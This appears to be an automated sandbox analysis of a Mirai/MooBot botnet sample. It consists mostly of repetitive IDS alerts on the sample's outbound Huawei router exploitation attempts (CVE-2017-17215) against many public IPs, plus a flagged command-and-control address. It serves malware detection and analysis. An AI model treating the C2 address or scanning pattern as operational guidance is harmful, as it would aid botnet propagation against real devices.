                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827161
                SID:2829579
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738405
                SID:2829579
                Source Port:54246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559990
                SID:2829579
                Source Port:46260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025765
                SID:2835222
                Source Port:51000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669587
                SID:2835222
                Source Port:57400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717045
                SID:2829579
                Source Port:35400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714302
                SID:2829579
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659771
                SID:2829579
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385947
                SID:2829579
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956038
                SID:2829579
                Source Port:46106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854183
                SID:2835222
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969814
                SID:2835222
                Source Port:60222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796192
                SID:2829579
                Source Port:47204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097526
                SID:2835222
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814961
                SID:2835222
                Source Port:34396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264653
                SID:2835222
                Source Port:52482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461811
                SID:2835222
                Source Port:47546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519642
                SID:2835222
                Source Port:49612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100892
                SID:2835222
                Source Port:36478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.570538
                SID:2829579
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910710
                SID:2835222
                Source Port:60936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733432
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926792
                SID:2835222
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329133
                SID:2829579
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083600
                SID:2829579
                Source Port:49702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332454
                SID:2835222
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363045
                SID:2835222
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716116
                SID:2835222
                Source Port:53914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732871
                SID:2829579
                Source Port:57592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472162
                SID:2835222
                Source Port:38340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073854
                SID:2829579
                Source Port:50904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041366
                SID:2829579
                Source Port:36798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624875
                SID:2829579
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058633
                SID:2835222
                Source Port:59252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982103
                SID:2835222
                Source Port:60008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240739
                SID:2835222
                Source Port:33694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903591
                SID:2835222
                Source Port:45020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077550
                SID:2829579
                Source Port:46966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: bot.mips.elfAvira: detected
                Source: bot.mips.elfReversingLabs: Detection: 75%

                Networking

                barindex
                Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:38292 -> 94.156.66.70:1235
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44368 -> 41.25.99.190:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44368 -> 41.25.99.190:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34162 -> 41.24.33.192:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34162 -> 41.24.33.192:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37890 -> 41.253.54.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37890 -> 41.253.54.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39692 -> 157.180.28.183:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39692 -> 157.180.28.183:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39264 -> 197.93.16.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39264 -> 197.93.16.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56014 -> 157.180.173.191:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56014 -> 157.180.173.191:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53048 -> 157.35.60.48:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53048 -> 157.35.60.48:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56234 -> 41.74.194.211:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56234 -> 41.74.194.211:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60216 -> 14.200.223.32:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60216 -> 14.200.223.32:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33256 -> 157.46.117.85:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33256 -> 157.46.117.85:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59544 -> 157.238.133.247:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59544 -> 157.238.133.247:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45808 -> 76.254.221.237:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45808 -> 76.254.221.237:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48730 -> 157.158.61.23:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48730 -> 157.158.61.23:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57682 -> 157.239.105.202:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57682 -> 157.239.105.202:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53050 -> 132.117.166.187:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53050 -> 132.117.166.187:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52810 -> 197.188.173.27:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52810 -> 197.188.173.27:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51864 -> 157.168.238.158:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51864 -> 157.168.238.158:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60390 -> 41.205.176.172:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60390 -> 41.205.176.172:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57764 -> 197.132.126.127:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57764 -> 197.132.126.127:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47348 -> 104.26.16.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47348 -> 104.26.16.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39310 -> 84.15.201.207:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39310 -> 84.15.201.207:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46988 -> 75.123.100.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46988 -> 75.123.100.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57688 -> 197.225.2.255:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57688 -> 197.225.2.255:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46476 -> 157.189.14.204:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46476 -> 157.189.14.204:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35600 -> 41.157.25.231:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35600 -> 41.157.25.231:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49884 -> 197.214.69.128:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49884 -> 197.214.69.128:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38662 -> 41.247.124.128:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38662 -> 41.247.124.128:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44882 -> 41.22.233.248:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44882 -> 41.22.233.248:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53760 -> 197.70.184.219:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53760 -> 197.70.184.219:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55650 -> 157.242.182.173:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55650 -> 157.242.182.173:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53378 -> 41.86.141.198:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53378 -> 41.86.141.198:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54540 -> 41.189.123.241:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54540 -> 41.189.123.241:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56316 -> 197.32.143.1:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56316 -> 197.32.143.1:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46840 -> 141.230.63.70:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46840 -> 141.230.63.70:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57496 -> 197.233.38.30:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57496 -> 197.233.38.30:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43536 -> 157.197.52.210:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43536 -> 157.197.52.210:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42648 -> 157.207.9.185:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42648 -> 157.207.9.185:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50320 -> 157.42.192.27:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50320 -> 157.42.192.27:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44542 -> 197.151.53.151:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44542 -> 197.151.53.151:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52484 -> 41.194.237.177:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52484 -> 41.194.237.177:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56394 -> 41.223.52.113:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56394 -> 41.223.52.113:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52184 -> 157.181.3.65:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52184 -> 157.181.3.65:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37404 -> 157.31.244.233:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37404 -> 157.31.244.233:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53132 -> 157.162.111.165:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53132 -> 157.162.111.165:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59400 -> 48.58.83.67:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59400 -> 48.58.83.67:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57626 -> 41.106.19.91:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57626 -> 41.106.19.91:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40844 -> 171.114.236.11:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40844 -> 171.114.236.11:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55672 -> 41.230.206.92:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55672 -> 41.230.206.92:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40820 -> 41.200.75.196:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40820 -> 41.200.75.196:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47068 -> 47.66.136.162:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47068 -> 47.66.136.162:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58078 -> 87.196.57.107:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58078 -> 87.196.57.107:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59314 -> 157.200.19.129:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59314 -> 157.200.19.129:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44238 -> 197.52.74.52:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44238 -> 197.52.74.52:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49520 -> 157.162.181.68:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49520 -> 157.162.181.68:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48570 -> 157.140.111.238:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48570 -> 157.140.111.238:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37262 -> 41.254.106.211:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37262 -> 41.254.106.211:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50402 -> 157.79.152.209:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50402 -> 157.79.152.209:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44198 -> 157.193.47.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44198 -> 157.193.47.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59494 -> 197.43.88.75:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59494 -> 197.43.88.75:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53116 -> 197.105.242.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53116 -> 197.105.242.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33430 -> 41.122.254.113:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33430 -> 41.122.254.113:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50368 -> 157.130.127.237:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50368 -> 157.130.127.237:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47626 -> 197.169.15.67:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47626 -> 197.169.15.67:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39366 -> 41.184.85.222:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39366 -> 41.184.85.222:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40168 -> 157.61.98.233:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40168 -> 157.61.98.233:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39388 -> 157.205.108.195:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39388 -> 157.205.108.195:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59784 -> 177.194.251.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59784 -> 177.194.251.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57578 -> 58.171.237.91:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57578 -> 58.171.237.91:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35836 -> 178.234.84.151:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35836 -> 178.234.84.151:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38788 -> 197.75.116.115:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38788 -> 197.75.116.115:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59462 -> 41.137.31.16:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59462 -> 41.137.31.16:37215
